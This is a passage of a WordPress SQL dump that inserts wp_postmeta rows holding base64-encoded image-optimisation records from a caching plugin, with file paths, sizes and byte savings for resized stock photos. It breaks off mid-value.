INSERT INTO `wp_postmeta` VALUES (28765, 2777, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MDEwNjE3Ny5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzAxMDYxNzcuanBnIiwid2lkdGgiOjQ4OTYsImhlaWdodCI6MzI2NCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU0Nzc0OSwiaWQiOiIyNzc3In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzcwMTA2MTc3LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MDEwNjE3Ny0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzAxMDYxNzctMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjUzNCwidGltZSI6MTQ4MzU0Nzc1MywiaWQiOjI3Nzd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MDEwNjE3Ny04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzAxMDYxNzctODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzcwMTA2MTc3LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxMDM1LCJ0aW1lIjoxNDgzNTQ3NzU3LCJpZCI6Mjc3N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzcwMTA2MTc3LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MDEwNjE3Ny03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzAxMDYxNzctNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEwNTQsInRpbWUiOjE0ODM1NDc3NjEsImlkIjoyNzc3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzAxMDYxNzctMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MDEwNjE3Ny0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MDEwNjE3Ny0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjo0NzMyLCJ0aW1lIjoxNDgzNTQ3NzY2LCJpZCI6Mjc3N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzcwMTA2MTc3LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MDEwNjE3Ny0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzAxMDYxNzctMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjUyNCwidGltZSI6MTQ4MzU0Nzc2OSwiaWQiOjI3Nzd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MDEwNjE3Ny0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzAxMDYxNzctMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzcwMTA2MTc3LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0MzUsInRpbWUiOjE0ODM1NDc3NzMsImlkIjoyNzc3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzAxMDYxNzctMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzcwMTA2MTc3LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MDEwNjE3Ny0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NDQ2LCJ0aW1lIjoxNDgzNTQ3Nzc3LCJpZCI6Mjc3N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzcwMTA2MTc3LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MDEwNjE3Ny01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzAxMDYxNzctNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjg0NiwidGltZSI6MTQ4MzU0Nzc4MSwiaWQiOjI3Nzd9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (28766, 2772, 'wpfc_optimisation_reduction', '4269'); 
INSERT INTO `wp_postmeta` VALUES (28767, 2772, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ5NTQ1MDAxMy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180OTU0NTAwMTMuanBnIiwid2lkdGgiOjQyNzIsImhlaWdodCI6Mjg0OCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180OTU0NTAwMTMuanBnIiwicmVkdWN0aW9uIjo0MjYxLCJ0aW1lIjoxNDgzNTQ3NzkyLCJpZCI6IjI3NzIifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180OTU0NTAwMTMtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDk1NDUwMDEzLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ5NTQ1MDAxMy0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0Nzc5NSwiaWQiOjI3NzJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ5NTQ1MDAxMy04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180OTU0NTAwMTMtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDk1NDUwMDEzLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3ODAwLCJpZCI6Mjc3Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDk1NDUwMDEzLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ5NTQ1MDAxMy03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180OTU0NTAwMTMtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDc4MDQsImlkIjoyNzcyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180OTU0NTAwMTMtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ5NTQ1MDAxMy0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ5NTQ1MDAxMy0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3ODA3LCJpZCI6Mjc3Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDk1NDUwMDEzLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ5NTQ1MDAxMy0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180OTU0NTAwMTMtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDc4MTAsImlkIjoyNzcyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180OTU0NTAwMTMtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDk1NDUwMDEzLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ5NTQ1MDAxMy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NzgxMywiaWQiOjI3NzJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ5NTQ1MDAxMy0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180OTU0NTAwMTMtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDk1NDUwMDEzLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3ODE2LCJpZCI6Mjc3Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDk1NDUwMDEzLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ5NTQ1MDAxMy01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180OTU0NTAwMTMtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDc4MTksImlkIjoyNzcyfV0='); 
INSERT INTO `wp_postmeta` VALUES (28768, 2770, 'wpfc_optimisation_reduction', '5987'); 
INSERT INTO `wp_postmeta` VALUES (28769, 2770, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzE2MTkxNjA5OC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18xNjE5MTYwOTguanBnIiwid2lkdGgiOjYwMTYsImhlaWdodCI6NDAxNiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU0NzgyNSwiaWQiOiIyNzcwIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMTYxOTE2MDk4LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzE2MTkxNjA5OC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18xNjE5MTYwOTgtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjU0NSwidGltZSI6MTQ4MzU0NzgyOCwiaWQiOjI3NzB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzE2MTkxNjA5OC04MDB4NTM0LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTM0LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18xNjE5MTYwOTgtODAweDUzNC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMTYxOTE2MDk4LTgwMHg1MzQuanBnIiwicmVkdWN0aW9uIjo4MzgsInRpbWUiOjE0ODM1NDc4MzMsImlkIjoyNzcwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18xNjE5MTYwOTgtNzY4eDUxMy5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMTYxOTE2MDk4LTc2OHg1MTMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzE2MTkxNjA5OC03Njh4NTEzLmpwZyIsInJlZHVjdGlvbiI6Nzc5LCJ0aW1lIjoxNDgzNTQ3ODM3LCJpZCI6Mjc3MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMTYxOTE2MDk4LTE2MDB4MTA2OC5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18xNjE5MTYwOTgtMTYwMHgxMDY4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18xNjE5MTYwOTgtMTYwMHgxMDY4LmpwZyIsInJlZHVjdGlvbiI6MTc3NCwidGltZSI6MTQ4MzU0Nzg0MywiaWQiOjI3NzB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzE2MTkxNjA5OC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18xNjE5MTYwOTgtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMTYxOTE2MDk4LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1MDUsInRpbWUiOjE0ODM1NDc4NDYsImlkIjoyNzcwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18xNjE5MTYwOTgtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMTYxOTE2MDk4LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzE2MTkxNjA5OC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDM0LCJ0aW1lIjoxNDgzNTQ3ODUwLCJpZCI6Mjc3MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMTYxOTE2MDk4LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzE2MTkxNjA5OC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fc